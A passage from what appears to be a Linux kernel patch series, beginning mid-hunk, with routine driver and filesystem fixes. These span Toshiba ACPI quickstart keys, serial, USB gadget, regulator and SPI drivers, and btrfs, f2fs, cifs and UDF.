+ 	"Call HCI_PANEL_POWER_ON on resume (-1 = auto, 0 = no, 1 = yes");
+ 
++static int hci_hotkey_quickstart = -1;
++module_param(hci_hotkey_quickstart, int, 0644);
++MODULE_PARM_DESC(hci_hotkey_quickstart,
++		 "Call HCI_HOTKEY_EVENT with value 0x5 for quickstart button support (-1 = auto, 0 = no, 1 = yes");
++
+ #define TOSHIBA_WMI_EVENT_GUID "59142400-C6A3-40FA-BADB-8A2652834100"
+ 
+ /* Scan code for Fn key on TOS1900 models */
+@@ -136,6 +141,7 @@ MODULE_PARM_DESC(turn_on_panel_on_resume,
+ #define HCI_ACCEL_MASK			0x7fff
+ #define HCI_ACCEL_DIRECTION_MASK	0x8000
+ #define HCI_HOTKEY_DISABLE		0x0b
++#define HCI_HOTKEY_ENABLE_QUICKSTART	0x05
+ #define HCI_HOTKEY_ENABLE		0x09
+ #define HCI_HOTKEY_SPECIAL_FUNCTIONS	0x10
+ #define HCI_LCD_BRIGHTNESS_BITS		3
+@@ -2730,10 +2736,15 @@ static int toshiba_acpi_enable_hotkeys(struct toshiba_acpi_dev *dev)
+ 		return -ENODEV;
+ 
+ 	/*
++	 * Enable quickstart buttons if supported.
++	 *
+ 	 * Enable the "Special Functions" mode only if they are
+ 	 * supported and if they are activated.
+ 	 */
+-	if (dev->kbd_function_keys_supported && dev->special_functions)
++	if (hci_hotkey_quickstart)
++		result = hci_write(dev, HCI_HOTKEY_EVENT,
++				   HCI_HOTKEY_ENABLE_QUICKSTART);
++	else if (dev->kbd_function_keys_supported && dev->special_functions)
+ 		result = hci_write(dev, HCI_HOTKEY_EVENT,
+ 				   HCI_HOTKEY_SPECIAL_FUNCTIONS);
+ 	else
+@@ -3259,7 +3270,14 @@ static const char *find_hci_method(acpi_handle handle)
+  * works. toshiba_acpi_resume() uses HCI_PANEL_POWER_ON to avoid changing
+  * the configured brightness level.
+  */
+-static const struct dmi_system_id turn_on_panel_on_resume_dmi_ids[] = {
++#define QUIRK_TURN_ON_PANEL_ON_RESUME		BIT(0)
++/*
++ * Some Toshibas use "quickstart" keys. On these, HCI_HOTKEY_EVENT must use
++ * the value HCI_HOTKEY_ENABLE_QUICKSTART.
++ */
++#define QUIRK_HCI_HOTKEY_QUICKSTART		BIT(1)
++
++static const struct dmi_system_id toshiba_dmi_quirks[] = {
+ 	{
+ 	 /* Toshiba Portégé R700 */
+ 	 /* https://bugzilla.kernel.org/show_bug.cgi?id=21012 */
+@@ -3267,6 +3285,7 @@ static const struct dmi_system_id turn_on_panel_on_resume_dmi_ids[] = {
+ 		DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"),
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "PORTEGE R700"),
+ 		},
++	 .driver_data = (void *)QUIRK_TURN_ON_PANEL_ON_RESUME,
+ 	},
+ 	{
+ 	 /* Toshiba Satellite/Portégé R830 */
+@@ -3276,6 +3295,7 @@ static const struct dmi_system_id turn_on_panel_on_resume_dmi_ids[] = {
+ 		DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"),
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "R830"),
+ 		},
++	 .driver_data = (void *)QUIRK_TURN_ON_PANEL_ON_RESUME,
+ 	},
+ 	{
+ 	 /* Toshiba Satellite/Portégé Z830 */
+@@ -3283,6 +3303,7 @@ static const struct dmi_system_id turn_on_panel_on_resume_dmi_ids[] = {
+ 		DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"),
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "Z830"),
+ 		},
++	 .driver_data = (void *)(QUIRK_TURN_ON_PANEL_ON_RESUME | QUIRK_HCI_HOTKEY_QUICKSTART),
+ 	},
+ };
+ 
+@@ -3291,6 +3312,8 @@ static int toshiba_acpi_add(struct acpi_device *acpi_dev)
+ 	struct toshiba_acpi_dev *dev;
+ 	const char *hci_method;
+ 	u32 dummy;
++	const struct dmi_system_id *dmi_id;
++	long quirks = 0;
+ 	int ret = 0;
+ 
+ 	if (toshiba_acpi)
+@@ -3443,8 +3466,15 @@ static int toshiba_acpi_add(struct acpi_device *acpi_dev)
+ 	}
+ #endif
+ 
++	dmi_id = dmi_first_match(toshiba_dmi_quirks);
++	if (dmi_id)
++		quirks = (long)dmi_id->driver_data;
++
+ 	if (turn_on_panel_on_resume == -1)
+-		turn_on_panel_on_resume = dmi_check_system(turn_on_panel_on_resume_dmi_ids);
++		turn_on_panel_on_resume = !!(quirks & QUIRK_TURN_ON_PANEL_ON_RESUME);
++
++	if (hci_hotkey_quickstart == -1)
++		hci_hotkey_quickstart = !!(quirks & QUIRK_HCI_HOTKEY_QUICKSTART);
+ 
+ 	toshiba_wwan_available(dev);
+ 	if (dev->wwan_supported)
+diff --git a/drivers/power/supply/cros_usbpd-charger.c b/drivers/power/supply/cros_usbpd-charger.c
+index b6c96376776a9..8008e31c0c098 100644
+--- a/drivers/power/supply/cros_usbpd-charger.c
++++ b/drivers/power/supply/cros_usbpd-charger.c
+@@ -5,6 +5,7 @@
+  * Copyright (c) 2014 - 2018 Google, Inc
+  */
+ 
++#include <linux/mod_devicetable.h>
+ #include <linux/module.h>
+ #include <linux/platform_data/cros_ec_commands.h>
+ #include <linux/platform_data/cros_ec_proto.h>
+@@ -711,16 +712,22 @@ static int cros_usbpd_charger_resume(struct device *dev)
+ static SIMPLE_DEV_PM_OPS(cros_usbpd_charger_pm_ops, NULL,
+ 			 cros_usbpd_charger_resume);
+ 
++static const struct platform_device_id cros_usbpd_charger_id[] = {
++	{ DRV_NAME, 0 },
++	{}
++};
++MODULE_DEVICE_TABLE(platform, cros_usbpd_charger_id);
++
+ static struct platform_driver cros_usbpd_charger_driver = {
+ 	.driver = {
+ 		.name = DRV_NAME,
+ 		.pm = &cros_usbpd_charger_pm_ops,
+ 	},
+-	.probe = cros_usbpd_charger_probe
++	.probe = cros_usbpd_charger_probe,
++	.id_table = cros_usbpd_charger_id,
+ };
+ 
+ module_platform_driver(cros_usbpd_charger_driver);
+ 
+ MODULE_LICENSE("GPL");
+ MODULE_DESCRIPTION("ChromeOS EC USBPD charger");
+-MODULE_ALIAS("platform:" DRV_NAME);
+diff --git a/drivers/ptp/ptp_sysfs.c b/drivers/ptp/ptp_sysfs.c
+index 74b9c794d6363..1263612ef2759 100644
+--- a/drivers/ptp/ptp_sysfs.c
++++ b/drivers/ptp/ptp_sysfs.c
+@@ -283,8 +283,7 @@ static ssize_t max_vclocks_store(struct device *dev,
+ 	if (max < ptp->n_vclocks)
+ 		goto out;
+ 
+-	size = sizeof(int) * max;
+-	vclock_index = kzalloc(size, GFP_KERNEL);
++	vclock_index = kcalloc(max, sizeof(int), GFP_KERNEL);
+ 	if (!vclock_index) {
+ 		err = -ENOMEM;
+ 		goto out;
+diff --git a/drivers/regulator/bd71815-regulator.c b/drivers/regulator/bd71815-regulator.c
+index c2b8b8be78242..4696255fca5d7 100644
+--- a/drivers/regulator/bd71815-regulator.c
++++ b/drivers/regulator/bd71815-regulator.c
+@@ -257,7 +257,7 @@ static int buck12_set_hw_dvs_levels(struct device_node *np,
+  * 10: 2.50mV/usec	10mV 4uS
+  * 11: 1.25mV/usec	10mV 8uS
+  */
+-static const unsigned int bd7181x_ramp_table[] = { 1250, 2500, 5000, 10000 };
++static const unsigned int bd7181x_ramp_table[] = { 10000, 5000, 2500, 1250 };
+ 
+ static int bd7181x_led_set_current_limit(struct regulator_dev *rdev,
+ 					int min_uA, int max_uA)
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index ff11f37e28c71..518b64b2d69bc 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -3341,6 +3341,7 @@ struct regmap *regulator_get_regmap(struct regulator *regulator)
+ 
+ 	return map ? map : ERR_PTR(-EOPNOTSUPP);
+ }
++EXPORT_SYMBOL_GPL(regulator_get_regmap);
+ 
+ /**
+  * regulator_get_hardware_vsel_register - get the HW voltage selector register
+diff --git a/drivers/scsi/qedi/qedi_debugfs.c b/drivers/scsi/qedi/qedi_debugfs.c
+index 8deb2001dc2ff..37eed6a278164 100644
+--- a/drivers/scsi/qedi/qedi_debugfs.c
++++ b/drivers/scsi/qedi/qedi_debugfs.c
+@@ -120,15 +120,11 @@ static ssize_t
+ qedi_dbg_do_not_recover_cmd_read(struct file *filp, char __user *buffer,
+ 				 size_t count, loff_t *ppos)
+ {
+-	size_t cnt = 0;
+-
+-	if (*ppos)
+-		return 0;
++	char buf[64];
++	int len;
+ 
+-	cnt = sprintf(buffer, "do_not_recover=%d\n", qedi_do_not_recover);
+-	cnt = min_t(int, count, cnt - *ppos);
+-	*ppos += cnt;
+-	return cnt;
++	len = sprintf(buf, "do_not_recover=%d\n", qedi_do_not_recover);
++	return simple_read_from_buffer(buffer, count, ppos, buf, len);
+ }
+ 
+ static int
+diff --git a/drivers/soc/ti/ti_sci_pm_domains.c b/drivers/soc/ti/ti_sci_pm_domains.c
+index a33ec7eaf23d1..17984a7bffba5 100644
+--- a/drivers/soc/ti/ti_sci_pm_domains.c
++++ b/drivers/soc/ti/ti_sci_pm_domains.c
+@@ -114,6 +114,18 @@ static const struct of_device_id ti_sci_pm_domain_matches[] = {
+ };
+ MODULE_DEVICE_TABLE(of, ti_sci_pm_domain_matches);
+ 
++static bool ti_sci_pm_idx_exists(struct ti_sci_genpd_provider *pd_provider, u32 idx)
++{
++	struct ti_sci_pm_domain *pd;
++
++	list_for_each_entry(pd, &pd_provider->pd_list, node) {
++		if (pd->idx == idx)
++			return true;
++	}
++
++	return false;
++}
++
+ static int ti_sci_pm_domain_probe(struct platform_device *pdev)
+ {
+ 	struct device *dev = &pdev->dev;
+@@ -153,8 +165,14 @@ static int ti_sci_pm_domain_probe(struct platform_device *pdev)
+ 				break;
+ 
+ 			if (args.args_count >= 1 && args.np == dev->of_node) {
+-				if (args.args[0] > max_id)
++				if (args.args[0] > max_id) {
+ 					max_id = args.args[0];
++				} else {
++					if (ti_sci_pm_idx_exists(pd_provider, args.args[0])) {
++						index++;
++						continue;
++					}
++				}
+ 
+ 				pd = devm_kzalloc(dev, sizeof(*pd), GFP_KERNEL);
+ 				if (!pd)
+diff --git a/drivers/spi/spi-stm32-qspi.c b/drivers/spi/spi-stm32-qspi.c
+index 9131660c1afb2..11cd7f20a80bf 100644
+--- a/drivers/spi/spi-stm32-qspi.c
++++ b/drivers/spi/spi-stm32-qspi.c
+@@ -350,7 +350,7 @@ static int stm32_qspi_wait_poll_status(struct stm32_qspi *qspi)
+ 
+ static int stm32_qspi_get_mode(u8 buswidth)
+ {
+-	if (buswidth == 4)
++	if (buswidth >= 4)
+ 		return CCR_BUSWIDTH_4;
+ 
+ 	return buswidth;
+@@ -654,9 +654,7 @@ static int stm32_qspi_setup(struct spi_device *spi)
+ 		return -EINVAL;
+ 
+ 	mode = spi->mode & (SPI_TX_OCTAL | SPI_RX_OCTAL);
+-	if ((mode == SPI_TX_OCTAL || mode == SPI_RX_OCTAL) ||
+-	    ((mode == (SPI_TX_OCTAL | SPI_RX_OCTAL)) &&
+-	    gpiod_count(qspi->dev, "cs") == -ENOENT)) {
++	if (mode && gpiod_count(qspi->dev, "cs") == -ENOENT) {
+ 		dev_err(qspi->dev, "spi-rx-bus-width\\/spi-tx-bus-width\\/cs-gpios\n");
+ 		dev_err(qspi->dev, "configuration not supported\n");
+ 
+@@ -677,10 +675,10 @@ static int stm32_qspi_setup(struct spi_device *spi)
+ 	qspi->cr_reg = CR_APMS | 3 << CR_FTHRES_SHIFT | CR_SSHIFT | CR_EN;
+ 
+ 	/*
+-	 * Dual flash mode is only enable in case SPI_TX_OCTAL and SPI_TX_OCTAL
+-	 * are both set in spi->mode and "cs-gpios" properties is found in DT
++	 * Dual flash mode is only enable in case SPI_TX_OCTAL or SPI_RX_OCTAL
++	 * is set in spi->mode and "cs-gpios" properties is found in DT
+ 	 */
+-	if (mode == (SPI_TX_OCTAL | SPI_RX_OCTAL)) {
++	if (mode) {
+ 		qspi->cr_reg |= CR_DFM;
+ 		dev_dbg(qspi->dev, "Dual flash mode enable");
+ 	}
+diff --git a/drivers/tty/serial/8250/8250_exar.c b/drivers/tty/serial/8250/8250_exar.c
+index 55451ff846520..b5ae6ec61c9fb 100644
+--- a/drivers/tty/serial/8250/8250_exar.c
++++ b/drivers/tty/serial/8250/8250_exar.c
+@@ -41,8 +41,50 @@
+ #define PCI_DEVICE_ID_COMMTECH_4228PCIE		0x0021
+ #define PCI_DEVICE_ID_COMMTECH_4222PCIE		0x0022
+ 
++#define PCI_VENDOR_ID_CONNECT_TECH				0x12c4
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_2_SP_OPTO        0x0340
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_4_SP_OPTO_A      0x0341
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_4_SP_OPTO_B      0x0342
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_2_XPRS           0x0350
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_4_XPRS_A         0x0351
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_4_XPRS_B         0x0352
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_8_XPRS           0x0353
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_16_XPRS_A        0x0354
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_16_XPRS_B        0x0355
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_2_XPRS_OPTO      0x0360
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_4_XPRS_OPTO_A    0x0361
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_4_XPRS_OPTO_B    0x0362
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_8_SP             0x0370
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_8_SP_232         0x0371
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_8_SP_485         0x0372
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_4_4_SP           0x0373
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_6_2_SP           0x0374
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_2_6_SP           0x0375
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_8_SP_232_NS      0x0376
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_2_XP_OPTO_LEFT   0x0380
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_2_XP_OPTO_RIGHT  0x0381
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_4_XP_OPTO        0x0382
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_4_4_XPRS_OPTO    0x0392
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_8_XPRS_LP        0x03A0
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_8_XPRS_LP_232    0x03A1
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_8_XPRS_LP_485    0x03A2
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCI_UART_8_XPRS_LP_232_NS 0x03A3
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCIE_XEG001               0x0602
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCIE_XR35X_BASE           0x1000
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCIE_XR35X_2              0x1002
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCIE_XR35X_4              0x1004
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCIE_XR35X_8              0x1008
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCIE_XR35X_12             0x100C
++#define PCI_SUBDEVICE_ID_CONNECT_TECH_PCIE_XR35X_16             0x1010
++#define PCI_DEVICE_ID_CONNECT_TECH_PCI_XR79X_12_XIG00X          0x110c
++#define PCI_DEVICE_ID_CONNECT_TECH_PCI_XR79X_12_XIG01X          0x110d
++#define PCI_DEVICE_ID_CONNECT_TECH_PCI_XR79X_16                 0x1110
++
+ #define PCI_DEVICE_ID_EXAR_XR17V4358		0x4358
+ #define PCI_DEVICE_ID_EXAR_XR17V8358		0x8358
++#define PCI_DEVICE_ID_EXAR_XR17V252		0x0252
++#define PCI_DEVICE_ID_EXAR_XR17V254		0x0254
++#define PCI_DEVICE_ID_EXAR_XR17V258		0x0258
+ 
+ #define PCI_SUBDEVICE_ID_USR_2980		0x0128
+ #define PCI_SUBDEVICE_ID_USR_2981		0x0129
+diff --git a/drivers/tty/serial/imx.c b/drivers/tty/serial/imx.c
+index 573bf7e9b7978..b20abaa9ef150 100644
+--- a/drivers/tty/serial/imx.c
++++ b/drivers/tty/serial/imx.c
+@@ -27,6 +27,7 @@
+ #include <linux/of.h>
+ #include <linux/of_device.h>
+ #include <linux/io.h>
++#include <linux/iopoll.h>
+ #include <linux/dma-mapping.h>
+ 
+ #include <asm/irq.h>
+@@ -2028,7 +2029,7 @@ imx_uart_console_write(struct console *co, const char *s, unsigned int count)
+ 	struct imx_port *sport = imx_uart_ports[co->index];
+ 	struct imx_port_ucrs old_ucr;
+ 	unsigned long flags;
+-	unsigned int ucr1;
++	unsigned int ucr1, usr2;
+ 	int locked = 1;
+ 
+ 	if (sport->port.sysrq)
+@@ -2059,8 +2060,8 @@ imx_uart_console_write(struct console *co, const char *s, unsigned int count)
+ 	 *	Finally, wait for transmitter to become empty
+ 	 *	and restore UCR1/2/3
+ 	 */
+-	while (!(imx_uart_readl(sport, USR2) & USR2_TXDC));
+-
++	read_poll_timeout_atomic(imx_uart_readl, usr2, usr2 & USR2_TXDC,
++				 0, USEC_PER_SEC, false, sport, USR2);
+ 	imx_uart_ucrs_restore(sport, &old_ucr);
+ 
+ 	if (locked)
+diff --git a/drivers/tty/tty_ldisc.c b/drivers/tty/tty_ldisc.c
+index 776d8a62f77cc..7ca7731fa78ae 100644
+--- a/drivers/tty/tty_ldisc.c
++++ b/drivers/tty/tty_ldisc.c
+@@ -546,6 +546,12 @@ int tty_set_ldisc(struct tty_struct *tty, int disc)
+ 		goto out;
+ 	}
+ 
++	if (tty->ops->ldisc_ok) {
++		retval = tty->ops->ldisc_ok(tty, disc);
++		if (retval)
++			goto out;
++	}
++
+ 	old_ldisc = tty->ldisc;
+ 
+ 	/* Shutdown the old discipline. */
+diff --git a/drivers/tty/vt/vt.c b/drivers/tty/vt/vt.c
+index 48a9ed7c93c97..e2f9348725ff1 100644
+--- a/drivers/tty/vt/vt.c
++++ b/drivers/tty/vt/vt.c
+@@ -3440,6 +3440,15 @@ static void con_cleanup(struct tty_struct *tty)
+ 	tty_port_put(&vc->port);
+ }
+ 
++/*
++ * We can't deal with anything but the N_TTY ldisc,
++ * because we can sleep in our write() routine.
++ */
++static int con_ldisc_ok(struct tty_struct *tty, int ldisc)
++{
++	return ldisc == N_TTY ? 0 : -EINVAL;
++}
++
+ static int default_color           = 7; /* white */
+ static int default_italic_color    = 2; // green (ASCII)
+ static int default_underline_color = 3; // cyan (ASCII)
+@@ -3566,6 +3575,7 @@ static const struct tty_operations con_ops = {
+ 	.resize = vt_resize,
+ 	.shutdown = con_shutdown,
+ 	.cleanup = con_cleanup,
++	.ldisc_ok = con_ldisc_ok,
+ };
+ 
+ static struct cdev vc0_cdev;
+diff --git a/drivers/usb/dwc3/dwc3-pci.c b/drivers/usb/dwc3/dwc3-pci.c
+index ae25ee832ec03..6110ab1f91318 100644
+--- a/drivers/usb/dwc3/dwc3-pci.c
++++ b/drivers/usb/dwc3/dwc3-pci.c
+@@ -8,6 +8,7 @@
+  *	    Sebastian Andrzej Siewior <bigeasy@linutronix.de>
+  */
+ 
++#include <linux/dmi.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/slab.h>
+@@ -219,6 +220,7 @@ static int dwc3_pci_quirks(struct dwc3_pci *dwc,
+ 
+ 		if (pdev->device == PCI_DEVICE_ID_INTEL_BYT) {
+ 			struct gpio_desc *gpio;
++			const char *bios_ver;
+ 			int ret;
+ 
+ 			/* On BYT the FW does not always enable the refclock */
+@@ -276,8 +278,12 @@ static int dwc3_pci_quirks(struct dwc3_pci *dwc,
+ 			 * detection. These can be identified by them _not_
+ 			 * using the standard ACPI battery and ac drivers.
+ 			 */
++			bios_ver = dmi_get_system_info(DMI_BIOS_VERSION);
+ 			if (acpi_dev_present("INT33FD", "1", 2) &&
+-			    acpi_quirk_skip_acpi_ac_and_battery()) {
++			    acpi_quirk_skip_acpi_ac_and_battery() &&
++			    /* Lenovo Yoga Tablet 2 Pro 1380 uses LC824206XA instead */
++			    !(bios_ver &&
++			      strstarts(bios_ver, "BLADE_21.X64.0005.R00.1504101516"))) {
+ 				dev_info(&pdev->dev, "Using TUSB1211 phy for charger detection\n");
+ 				swnode = &dwc3_pci_intel_phy_charger_detect_swnode;
+ 			}
+diff --git a/drivers/usb/gadget/function/f_hid.c b/drivers/usb/gadget/function/f_hid.c
+index f1ca9250cad96..bb558a575cb15 100644
+--- a/drivers/usb/gadget/function/f_hid.c
++++ b/drivers/usb/gadget/function/f_hid.c
+@@ -1025,9 +1025,9 @@ static inline int hidg_get_minor(void)
+ {
+ 	int ret;
+ 
+-	ret = ida_simple_get(&hidg_ida, 0, 0, GFP_KERNEL);
++	ret = ida_alloc(&hidg_ida, GFP_KERNEL);
+ 	if (ret >= HIDG_MINORS) {
+-		ida_simple_remove(&hidg_ida, ret);
++		ida_free(&hidg_ida, ret);
+ 		ret = -ENODEV;
+ 	}
+ 
+@@ -1172,7 +1172,7 @@ static const struct config_item_type hid_func_type = {
+ 
+ static inline void hidg_put_minor(int minor)
+ {
+-	ida_simple_remove(&hidg_ida, minor);
++	ida_free(&hidg_ida, minor);
+ }
+ 
+ static void hidg_free_inst(struct usb_function_instance *f)
+diff --git a/drivers/usb/gadget/function/f_printer.c b/drivers/usb/gadget/function/f_printer.c
+index a881c69b1f2bf..8545656419c71 100644
+--- a/drivers/usb/gadget/function/f_printer.c
++++ b/drivers/usb/gadget/function/f_printer.c
+@@ -1316,9 +1316,9 @@ static inline int gprinter_get_minor(void)
+ {
+ 	int ret;
+ 
+-	ret = ida_simple_get(&printer_ida, 0, 0, GFP_KERNEL);
++	ret = ida_alloc(&printer_ida, GFP_KERNEL);
+ 	if (ret >= PRINTER_MINORS) {
+-		ida_simple_remove(&printer_ida, ret);
++		ida_free(&printer_ida, ret);
+ 		ret = -ENODEV;
+ 	}
+ 
+@@ -1327,7 +1327,7 @@ static inline int gprinter_get_minor(void)
+ 
+ static inline void gprinter_put_minor(int minor)
+ {
+-	ida_simple_remove(&printer_ida, minor);
++	ida_free(&printer_ida, minor);
+ }
+ 
+ static int gprinter_setup(int);
+diff --git a/drivers/usb/gadget/function/rndis.c b/drivers/usb/gadget/function/rndis.c
+index 29bf8664bf582..12c5d9cf450c1 100644
+--- a/drivers/usb/gadget/function/rndis.c
++++ b/drivers/usb/gadget/function/rndis.c
+@@ -869,12 +869,12 @@ EXPORT_SYMBOL_GPL(rndis_msg_parser);
+ 
+ static inline int rndis_get_nr(void)
+ {
+-	return ida_simple_get(&rndis_ida, 0, 1000, GFP_KERNEL);
++	return ida_alloc_max(&rndis_ida, 999, GFP_KERNEL);
+ }
+ 
+ static inline void rndis_put_nr(int nr)
+ {
+-	ida_simple_remove(&rndis_ida, nr);
++	ida_free(&rndis_ida, nr);
+ }
+ 
+ struct rndis_params *rndis_register(void (*resp_avail)(void *v), void *v)
+diff --git a/drivers/usb/misc/uss720.c b/drivers/usb/misc/uss720.c
+index b00d92db5dfd1..eb5a8e0d9e2d6 100644
+--- a/drivers/usb/misc/uss720.c
++++ b/drivers/usb/misc/uss720.c
+@@ -677,7 +677,7 @@ static int uss720_probe(struct usb_interface *intf,
+ 	struct parport_uss720_private *priv;
+ 	struct parport *pp;
+ 	unsigned char reg;
+-	int i;
++	int ret;
+ 
+ 	dev_dbg(&intf->dev, "probe: vendor id 0x%x, device id 0x%x\n",
+ 		le16_to_cpu(usbdev->descriptor.idVendor),
+@@ -688,8 +688,8 @@ static int uss720_probe(struct usb_interface *intf,
+ 		usb_put_dev(usbdev);
+ 		return -ENODEV;
+ 	}
+-	i = usb_set_interface(usbdev, intf->altsetting->desc.bInterfaceNumber, 2);
+-	dev_dbg(&intf->dev, "set interface result %d\n", i);
++	ret = usb_set_interface(usbdev, intf->altsetting->desc.bInterfaceNumber, 2);
++	dev_dbg(&intf->dev, "set interface result %d\n", ret);
+ 
+ 	interface = intf->cur_altsetting;
+ 
+@@ -725,12 +725,18 @@ static int uss720_probe(struct usb_interface *intf,
+ 	set_1284_register(pp, 7, 0x00, GFP_KERNEL);
+ 	set_1284_register(pp, 6, 0x30, GFP_KERNEL);  /* PS/2 mode */
+ 	set_1284_register(pp, 2, 0x0c, GFP_KERNEL);
+-	/* debugging */
+-	get_1284_register(pp, 0, &reg, GFP_KERNEL);
++
++	/* The Belkin F5U002 Rev 2 P80453-B USB parallel port adapter shares the
++	 * device ID 050d:0002 with some other device that works with this
++	 * driver, but it itself does not. Detect and handle the bad cable
++	 * here. */
++	ret = get_1284_register(pp, 0, &reg, GFP_KERNEL);
+ 	dev_dbg(&intf->dev, "reg: %7ph\n", priv->reg);
++	if (ret < 0)
++		return ret;
+ 
+-	i = usb_find_last_int_in_endpoint(interface, &epd);
+-	if (!i) {
++	ret = usb_find_last_int_in_endpoint(interface, &epd);
++	if (!ret) {
+ 		dev_dbg(&intf->dev, "epaddr %d interval %d\n",
+ 				epd->bEndpointAddress, epd->bInterval);
+ 	}
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 5993b627be580..77f24168c7ed2 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1615,6 +1615,7 @@ void btrfs_reclaim_bgs_work(struct work_struct *work)
+ 		container_of(work, struct btrfs_fs_info, reclaim_bgs_work);
+ 	struct btrfs_block_group *bg;
+ 	struct btrfs_space_info *space_info;
++	LIST_HEAD(retry_list);
+ 
+ 	if (!test_bit(BTRFS_FS_OPEN, &fs_info->flags))
+ 		return;
+@@ -1717,8 +1718,11 @@ void btrfs_reclaim_bgs_work(struct work_struct *work)
+ 		}
+ 
+ next:
+-		if (ret)
+-			btrfs_mark_bg_to_reclaim(bg);
++		if (ret) {
++			/* Refcount held by the reclaim_bgs list after splice. */
++			btrfs_get_block_group(bg);
++			list_add_tail(&bg->bg_list, &retry_list);
++		}
+ 		btrfs_put_block_group(bg);
+ 
+ 		mutex_unlock(&fs_info->reclaim_bgs_lock);
+@@ -1738,6 +1742,9 @@ void btrfs_reclaim_bgs_work(struct work_struct *work)
+ 	spin_unlock(&fs_info->unused_bgs_lock);
+ 	mutex_unlock(&fs_info->reclaim_bgs_lock);
+ end:
++	spin_lock(&fs_info->unused_bgs_lock);
++	list_splice_tail(&retry_list, &fs_info->reclaim_bgs);
++	spin_unlock(&fs_info->unused_bgs_lock);
+ 	btrfs_exclop_finish(fs_info);
+ 	sb_end_write(fs_info->sb);
+ }
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index c529ce5d986cc..f496622921843 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -2092,8 +2092,6 @@ static void default_options(struct f2fs_sb_info *sbi)
+ 	F2FS_OPTION(sbi).bggc_mode = BGGC_MODE_ON;
+ 	F2FS_OPTION(sbi).memory_mode = MEMORY_MODE_NORMAL;
+ 
+-	sbi->sb->s_flags &= ~SB_INLINECRYPT;
+-
+ 	set_opt(sbi, INLINE_XATTR);
+ 	set_opt(sbi, INLINE_DATA);
+ 	set_opt(sbi, INLINE_DENTRY);
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+index f0a3336ffb6c8..13d038a96a5c0 100644
+--- a/fs/smb/client/cifsfs.c
++++ b/fs/smb/client/cifsfs.c
+@@ -128,7 +128,7 @@ module_param(enable_oplocks, bool, 0644);
+ MODULE_PARM_DESC(enable_oplocks, "Enable or disable oplocks. Default: y/Y/1");
+ 
+ module_param(enable_gcm_256, bool, 0644);
+-MODULE_PARM_DESC(enable_gcm_256, "Enable requesting strongest (256 bit) GCM encryption. Default: n/N/0");
++MODULE_PARM_DESC(enable_gcm_256, "Enable requesting strongest (256 bit) GCM encryption. Default: y/Y/0");
+ 
+ module_param(require_gcm_256, bool, 0644);
+ MODULE_PARM_DESC(require_gcm_256, "Require strongest (256 bit) GCM encryption. Default: n/N/0");
+diff --git a/fs/udf/udftime.c b/fs/udf/udftime.c
+index fce4ad976c8c2..26169b1f482c3 100644
+--- a/fs/udf/udftime.c
++++ b/fs/udf/udftime.c
+@@ -60,13 +60,18 @@ udf_disk_stamp_to_time(struct timespec64 *dest, struct timestamp src)
+ 	dest->tv_sec = mktime64(year, src.month, src.day, src.hour, src.minute,
+ 			src.second);
+ 	dest->tv_sec -= offset * 60;
+-	dest->tv_nsec = 1000 * (src.centiseconds * 10000 +
+-			src.hundredsOfMicroseconds * 100 + src.microseconds);
++
+ 	/*
+ 	 * Sanitize nanosecond field since reportedly some filesystems are
+ 	 * recorded with bogus sub-second values.
+ 	 */
+-	dest->tv_nsec %= NSEC_PER_SEC;
++	if (src.centiseconds < 100 && src.hundredsOfMicroseconds < 100 &&
++	    src.microseconds < 100) {
++		dest->tv_nsec = 1000 * (src.centiseconds * 10000 +
++			src.hundredsOfMicroseconds * 100 + src.microseconds);
++	} else {
++		dest->tv_nsec = 0;
++	}
+ }
+ 
+ void
